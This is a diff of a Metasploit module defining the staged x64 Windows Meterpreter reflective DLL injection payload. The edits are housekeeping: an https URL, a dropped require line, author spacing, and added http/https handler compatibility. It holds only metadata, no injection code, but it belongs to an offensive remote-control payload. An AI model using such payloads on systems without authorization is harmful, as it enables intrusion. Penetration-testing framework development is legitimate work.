@@ -1,10 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
 require 'msf/core/payload/windows/x64/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x64_win'
 require 'msf/base/sessions/meterpreter_options'
@@ -25,8 +23,8 @@ module MetasploitModule
     super(update_info(info,
       'Name'          => 'Windows Meterpreter (Reflective Injection x64)',
       'Description'   => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)',
-      'Author'        => ['skape','sf', 'OJ Reeves'],
-      'PayloadCompat' => { 'Convention' => 'sockrdi', },
+      'Author'        => ['skape', 'sf', 'OJ Reeves'],
+      'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi http https'},
       'License'       => MSF_LICENSE,
       'Session'       => Msf::Sessions::Meterpreter_x64_Win))
   end
